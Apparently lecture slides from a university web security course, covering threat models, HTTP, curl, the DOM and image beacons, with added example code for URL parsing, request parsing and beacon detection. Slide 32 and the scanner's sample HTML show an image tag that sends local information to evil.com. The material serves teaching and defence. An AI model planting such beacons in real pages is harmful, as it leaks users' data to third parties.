CSE484/CSE584 BASIC WEB SECURITY MODEL, Dr. Benjamin Livshits (PowerPoint PPT presentation)



  1. CSE484/CSE584 BASIC WEB SECURITY MODEL Dr. Benjamin Livshits

  2. Web Security: a Web Attacker sets up a malicious site visited by the victim (Alice); no control of the network.

  3. Network Security: a Network Attacker intercepts and controls network communication to and from Alice.

  4. Web Malware Attacker: a Malware Attacker escapes the browser to wreak havoc on Alice’s machine.

  5. Web Threat Models
  - Web attacker
    - Controls https://attacker.com
    - Can obtain an SSL/TLS certificate for https://attacker.com
    - User visits attacker.com (or runs the attacker’s Facebook app, etc.)
  - Network attacker
    - Passive: wireless eavesdropper
    - Active: evil router, DNS poisoning
  - Malware attacker
    - Attacker escapes the browser isolation mechanisms and runs separately under control of the OS
    - (Side note on the slide: this is what connects the world of web attacks to the low-level memory-based exploitation we’ve seen so far)

  6. Goals of Web Security
  - Safely browse the web: users should be able to visit a variety of web sites without incurring harm
    - No stolen information such as login credentials or cookies
    - Site A cannot compromise the session at Site B
  - Support secure web applications: applications delivered over the web should have the same security properties we require for stand-alone applications
    - Maybe even better properties, because most web applications enjoy the protection provided by memory-safe languages
    - (Side note on the slide: we will see a lot of Java, PHP and JavaScript, but not C or C++)

  7. Looking Ahead
  - HTTP
  - Communication
  - Rendering content
  - Navigation
  - Cookies
  - Security User Interface
  - Isolation
  - Frames and frame busting

  8. HTTP

  9. URLs or URIs
  - Global identifiers of network-retrievable documents
  - Example: https://courses.cs.washington.edu:80/courses/cse484/14au/#schedule
    (protocol: https; hostname: courses.cs.washington.edu; port: 80; path: /courses/cse484/14au/; fragment: schedule)
  - Special characters are encoded as hex:
    - %0A = newline
    - %20 or + = space; %2B = + (special exception)
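The slide's URL components and its percent-encoding rules, worked through in code. This is an added example and not code from the course; it uses only Node's built-in URL and URLSearchParams, and the sample URL is the one on the slide.

```javascript
// Added example, not code from the slides: break a URL into the components the
// slide labels (protocol, hostname, port, path, fragment) and show how the
// form-style encoding rules on the slide behave. Uses only Node's built-in
// URL and URLSearchParams; the sample URL is the one on the slide.

const SLIDE_URL = 'https://courses.cs.washington.edu:80/courses/cse484/14au/#schedule';

// Split a URL into the pieces named on the slide.
function parseUrl(text) {
  const u = new URL(text);
  return {
    protocol: u.protocol.replace(/:$/, ''), // "https:" -> "https"
    hostname: u.hostname,
    port: u.port,                            // "" when the scheme default is used
    path: u.pathname,
    fragment: u.hash.replace(/^#/, ''),      // kept by the browser, never sent to the server
  };
}

// Serialise key/value pairs as a query string or POST body
// (application/x-www-form-urlencoded): a space becomes "+", and a literal "+"
// must become %2B, because the receiver turns a bare "+" back into a space.
function formEncode(params) {
  return new URLSearchParams(params).toString();
}

// Decode a form body the way a server does: %20 and "+" both become spaces,
// %2B becomes a literal "+", %0A becomes a newline.
function formDecode(body) {
  return Object.fromEntries(new URLSearchParams(body));
}

// Encode a single value for use anywhere in a URL: encodeURIComponent uses
// %20 for a space and %2B for "+", and never emits a bare "+", so the result
// reads the same in a path segment and in a query value.
function pctEncode(value) {
  return encodeURIComponent(value);
}

console.log(parseUrl(SLIDE_URL));
console.log(formEncode({ name: 'I am Daniel', expr: '1+1' }));
console.log(formDecode('a=x%20y&b=p+q&c=1%2B1&d=line%0Abreak'));
console.log(pctEncode('I am Daniel+'));
```

The point of the two decoders is the "special exception" on the slide: a bare `+` only means space in the query string and in form bodies, so code that builds URLs by string concatenation must encode a literal `+` as `%2B` or the server will read it as a space.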

  10. Short and Long URLs 10 10 Bit.ly: http://bit.ly/1vEIGks  http://longurlmaker.com:  http://www.longurlmaker.com/go?id=7continuedg20fIs.gd0GetShortyagl56001drawn%2Boutu6lingeringShortlinksX .sestretchedd7lingeringzc8faraway0UrlTeajbstretched15jcontinued011expanded86v3stretchedqdXil40ShortenURLk Xilz401spun%2Boutq54bextensiveShrtndwoutstretched151TinyLinkcontinued2lastingdltallaU76nr0h61g5aIs.gdd01 41cMooURL085ShortURLcShortenURL40stretchrangyXil3p17hSitelutionsuwURLvi1enlargedc03743186701Dwarfurl 4aefwextensive0EasyURL315continuedbprotractedb19GetShorty2SHurl171enduring038r8bURLviremote6URL1Shor tURLspun%2Boutelongated0aX.seoutstretched0d4distantSimURL27highd418olasting9ShoterLink8stretchedoSHurl4 lankydrawn%2Bout0drawn%2Boutlofty19a2kenduringShortenURLxs0spread%2Bout9distantFly2d10101great0w78 NutshellURL190Minilienstretchedn0stretchd0ShortenURL0enlargedtallX.seelongated9URL.co.ukspun%2BoutURLvi8 e1012Shim00Ulimit7lasting3Shim034far%2Boff47spun%2Bout17nwelongated17a99eeexpandedtallm9MooURL1dr emote46URL11NutshellURLStartURLb5itall40c6Shrinkr0Fly2lasting91n8clengthened51X.se5Minilien2ShredURLBea m.to99continued131G8L1ffarawaycontinued0distantrangy7c04964300315a2RubyURLfU76154j1roh82lengthened0 faraway1z4outstretched1lr1B654301URL09stringyq8ShrinkURL184h7Dwarfurldrunningloftylingering18spread%2Bo ut68101ShortURL10kalengthy9B653ab41fextensive0prolonged7p11expandedprolongedremotec2Minilien0dB65str etchingarfaraway3extensive1yclnk.in9lankygreat50TightURL173cURL.co.ukmba2049815920prolonged8fprotractedf 0stringy6i164eelongatedMiniliene9elongated0PiURL1488gd2020a30far%2Breachinglengthy216d411t691elongate1 6extensived0drawn%2Bout11lankyYepItB65Shim31extensiveURLCutterShim99GetShorty1042Fly2af0e8protractede longatey0111563FhURL9c3TinyURLn8toweringDwarfurl10d6350c5TightURL3lnk.in03Shrtnd6g0lingering18gangling prolonged8astringy7StartURL100TraceURLSmallr01drawn%2Bout60ganglingstringy80Beam.tocdistantsG8LX.sedra 
wn%2Boutedrawn%2Bouty040SitelutionsU7601drawn%2Bout6f53A2N2lasting1194stretchinggangling20lnk.inURLC utter135b80b3ShortURL6far%2Boffm013q515deep8WapURLShrinkURLd410090lnk.infar%2Boff701far%2Boff96ling ering8a6x38118Redirxfar%2Breaching1stretched0protracted16t0l21130b90106zShoterLink967Smallr9R

  11. HTTP Request (method, file, HTTP version, headers, blank line, data)
      GET /index.html HTTP/1.1
      Accept: image/gif, image/x-bitmap, image/jpeg, */*
      Accept-Language: en
      Connection: Keep-Alive
      User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)
      Host: www.example.com
      Referer: http://www.google.com?q=dingbats
      (blank line)
      Data: none for GET
  - GET: no side effect
  - POST: possible side effect

  12. POST
      POST /pass.php HTTP/1.1
      Host: 127.0.0.1
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      DNT: 1
      Referer: http://127.0.0.1/pass.php
      Cookie: passx=87e8af376bc9d9bfec2c7c0193e6af70; PHPSESSID=l9hk7mfh0ppqecg8gialak6gt5
      Connection: keep-alive
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 30

      username=zurfyx&pass=password
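A parser for the raw request format shown on the two HTTP request slides, as an added example (not course code). It splits the request line, headers and body, refuses a request whose Content-Length does not describe the body it actually received, and decodes the Cookie header and the form body. The request text is constructed for this example and reuses the slide's field names; its Content-Length is 29 because that is the length of the constructed body.

```javascript
// Added example, not code from the slides: a small parser for a raw HTTP/1.1
// request like the POST on the slide. It splits the request line, headers and
// body, checks that Content-Length matches the body actually received, and
// decodes the cookie header and the form body. The request text below is
// constructed for this example (it reuses the slide's field names).

const SAMPLE_REQUEST = [
  'POST /pass.php HTTP/1.1',
  'Host: 127.0.0.1',
  'Referer: http://127.0.0.1/pass.php',
  'Cookie: passx=87e8af376bc9d9bfec2c7c0193e6af70; PHPSESSID=l9hk7mfh0ppqecg8gialak6gt5',
  'Content-Type: application/x-www-form-urlencoded',
  'Content-Length: 29',
  '',
  'username=zurfyx&pass=password',
].join('\r\n');

// Same request, but the declared length does not match the 29-byte body.
const MISMATCHED_REQUEST = SAMPLE_REQUEST.replace('Content-Length: 29', 'Content-Length: 30');

function parseRequest(raw) {
  const sep = raw.indexOf('\r\n\r\n');
  if (sep === -1) throw new Error('malformed request: no blank line after headers');
  const headLines = raw.slice(0, sep).split('\r\n');
  const body = raw.slice(sep + 4);

  const [method, target, version, ...extra] = headLines[0].split(' ');
  if (!method || !target || !version || extra.length) {
    throw new Error('malformed request line: ' + headLines[0]);
  }

  // Header names are case-insensitive, so store them lowercased. A repeated
  // header is kept as a list rather than letting the last copy overwrite the first.
  const headers = {};
  for (const line of headLines.slice(1)) {
    const colon = line.indexOf(':');
    if (colon <= 0) throw new Error('malformed header: ' + line);
    const name = line.slice(0, colon).trim().toLowerCase();
    const value = line.slice(colon + 1).trim();
    if (!headers[name]) headers[name] = [];
    headers[name].push(value);
  }

  // The body must be exactly as long as Content-Length says; anything else is
  // rejected rather than guessed at.
  if (headers['content-length']) {
    if (headers['content-length'].length !== 1) throw new Error('multiple Content-Length headers');
    const declared = Number(headers['content-length'][0]);
    const actual = Buffer.byteLength(body, 'utf8');
    if (!Number.isInteger(declared) || declared < 0 || declared !== actual) {
      throw new Error(`Content-Length ${declared} does not match body of ${actual} bytes`);
    }
  }

  return { method, target, version, headers, body };
}

// "a=1; b=2" -> { a: "1", b: "2" }
function parseCookies(req) {
  const out = {};
  for (const raw of req.headers['cookie'] || []) {
    for (const pair of raw.split(';')) {
      const eq = pair.indexOf('=');
      if (eq === -1) continue;
      out[pair.slice(0, eq).trim()] = pair.slice(eq + 1).trim();
    }
  }
  return out;
}

// Decode the body only when the Content-Type says it is a URL-encoded form.
function parseFormBody(req) {
  const type = (req.headers['content-type'] || [''])[0];
  if (!type.toLowerCase().startsWith('application/x-www-form-urlencoded')) return null;
  return Object.fromEntries(new URLSearchParams(req.body));
}

// true when the parser refuses a request whose Content-Length lies about the body
function rejectsLengthMismatch(raw) {
  try { parseRequest(raw); return false; } catch (e) { return /Content-Length/.test(e.message); }
}

console.log(parseRequest(SAMPLE_REQUEST).method, parseFormBody(parseRequest(SAMPLE_REQUEST)));
```

Two things worth noticing when you run it: the session identifier travels in the Cookie header, in the clear, on every request to the host, and the password travels in the body as a plain form field, which is why the slide's example only makes sense over TLS. The strict Content-Length check is deliberate: a parser that silently accepts a body shorter or longer than declared disagrees with whatever is on the other side of the connection about where one request ends and the next begins.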

  13. Automation with CURL
  - curl --data "birthyear=1905&press=%20OK%20" http://www.example.com/when.cgi
  - curl --data-urlencode "name=I am Daniel" http://www.example.com
  - Submit/POST binary data to a URL:
    curl -X POST --data-binary @myfile.bin http://foo.com

  14. HTTP Response (HTTP version, status code, reason phrase, headers, blank line, data)
      HTTP/1.0 200 OK
      Date: Sun, 21 Apr 1996 02:20:42 GMT
      Server: Microsoft-Internet-Information-Server/5.0
      Connection: keep-alive
      Content-Type: text/html
      Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT
      Set-Cookie: …
      Content-Length: 2543

      <HTML> Some data... blah, blah, blah </HTML>
  - Cookies are delivered in the Set-Cookie header

  15. Common HTTP Codes
      200 OK                     401 Unauthorized
      300 Multiple Choices       403 Forbidden
      301 Moved Permanently      404 Not Found
      302 Found                  410 Gone
      304 Not Modified           500 Internal Server Error
      307 Temporary Redirect     501 Not Implemented
      400 Bad Request            503 Service Unavailable
                                 550 Permission denied

  16. Browser Tools

  17. Watch the HTTP Traffic

  18. HTTP Supports Caching

  19. And Responses Can Be Interesting

  20. And Surprising…

  21. Interacting with Google using CURL
  1. Authenticate with Google first:
     curl https://www.google.com/accounts/ClientLogin --data-urlencode Email=you@gmail.com --data-urlencode Passwd=yourpasswd -d accountType=GOOGLE -d source=your.org-your.service-your.service.version -d service=wise
     (returns SID=DQAAANcAAABjXXX; LSID=DQAAANoAXXX; Auth=DQAAANkAXXX)
  2. Get your spreadsheets:
     curl --silent --header "Authorization: GoogleLogin auth=DQAAANkAXXX" "https://spreadsheets.google.com/feeds/spreadsheets/private/full" | tidy -xml -indent -quiet
  3. Get a particular spreadsheet:
     curl --silent --header "Authorization: GoogleLogin auth=$AUTH" "https://spreadsheets.google.com/feeds/download/spreadsheets/Export?key=$KEY&exportFormat=tsv" | sort -n -k 15 -t $'\t'

  22. Rendering Content

  23. Rendering and Events
  - Each browser window or frame…
    - Loads content
    - Renders it: processes HTML and scripts to display the page; may involve images, sub-frames, etc.
    - Responds to events
  - Events can be
    - User actions: OnClick, OnMouseover
    - Rendering: OnLoad, OnBeforeUnload
    - Timing: setTimeout(), clearTimeout()

  24. Connecting it All Together

  25. Slightly More Complex…

  26. Document Object Model (DOM)
  - Object-oriented interface used to read and write docs
  - A web page in HTML is structured data; the DOM provides a representation of this hierarchy
  - Includes the Browser Object Model (BOM): window, document, frames[], history, location, navigator (type and version of the browser)

  27. Deep DOM Trees

  28. Pre-Year 2000 (frame)

  29. Pre-Year 2000: Functionality Added Via JavaScript (frame)

  30. Changing HTML using JavaScript, DOM
  - Some possibilities: createElement(elementName), createTextNode(text), appendChild(newChild), removeChild(node)
  - HTML:
      <ul id="t1">
        <li> Item 1 </li>
      </ul>
  - Example: add a new list item:
      var text = 'Item 2'   // the string for the new item (the slide leaves this variable undefined)
      var list = document.getElementById('t1')
      var newitem = document.createElement('li')
      var newtext = document.createTextNode(text)   // a text node, so the string is never parsed as HTML
      list.appendChild(newitem)
      newitem.appendChild(newtext)

  31. HTML Image Tags
      <html> … <p> … </p> …
      <img src="http://example.com/sunset.gif" height="50" width="100">
      … </html>
  Any security issues?

  32. Image Beacons
  - Communicate with other sites:
      <img src="http://evil.com/pass-local-information.jpg?extra_information">
  - Hide the resulting image:
      <img src="…" height="1" width="1">
  - Spoof other sites: add logos that fool a user
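From the defender's side, the beacon pattern on this slide (a cross-origin image, usually 1x1, with data smuggled in its query string) is easy to spot in page markup. The scanner below is an added example, not course code: it pulls the `<img>` tags out of an HTML string, resolves each source against the page origin, and flags the ones that match the beacon shape. The HTML and the page origin are constructed for the example.

```javascript
// Added example, not code from the slides: a small defensive scanner that flags
// <img> tags in a page which look like beacons: sources on a different origin
// than the page, combined with 1x1 dimensions or a query string carrying data.
// The page origin and the HTML below are constructed for this example.

const PAGE_ORIGIN = 'https://example.com';

const SAMPLE_HTML = `
<html><body>
<img src="http://example.com/sunset.gif" height="50" width="100">
<img src="http://evil.com/pass-local-information.jpg?extra_information=abc" height="1" width="1">
<img src="/static/logo.png" width="200" height="40">
<img src="https://cdn.example.net/pixel.gif?uid=42" width="1" height="1">
</body></html>`;

// Pull the attributes out of every <img ...> tag (quoted or bare values).
function extractImages(html) {
  const tags = html.match(/<img\b[^>]*>/gi) || [];
  return tags.map((tag) => {
    const attrs = {};
    const re = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
    let m;
    while ((m = re.exec(tag)) !== null) {
      attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
    }
    return attrs;
  });
}

// Decide whether one image looks like a beacon and say why.
function classifyImage(attrs, pageOrigin) {
  // Resolve relative sources against the page so "/static/logo.png" is same-origin.
  const src = new URL(attrs.src || '', pageOrigin);
  const page = new URL(pageOrigin);
  const crossOrigin = src.origin !== page.origin;   // scheme, host and port all count
  const tiny = attrs.width === '1' && attrs.height === '1';
  const carriesData = src.search.length > 1;        // "?" followed by something
  const reasons = [];
  if (crossOrigin) reasons.push('cross-origin');
  if (tiny) reasons.push('1x1');
  if (carriesData) reasons.push('query-string');
  return { src: src.href, reasons, suspicious: crossOrigin && (tiny || carriesData) };
}

// All images in the page that match the beacon shape.
function findBeacons(html, pageOrigin) {
  return extractImages(html)
    .map((attrs) => classifyImage(attrs, pageOrigin))
    .filter((c) => c.suspicious);
}

console.log(findBeacons(SAMPLE_HTML, PAGE_ORIGIN));
```

Note that the scheme is part of the origin, so the slide's own `http://example.com/sunset.gif` counts as cross-origin on an https page; it is not flagged here only because it is neither tiny nor carrying a query string. A scanner like this is a review aid, not a control: the browser-side control that actually stops a page from loading images from arbitrary hosts is a Content-Security-Policy `img-src` directive listing the origins the page is allowed to fetch images from.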

  33. Beacons in Practice

  34. onError in JavaScript
  - Triggered in case of error
  - Can register a JavaScript handler:
      <img src="image.gif" onerror="alert('The image couldn’t be loaded.')">
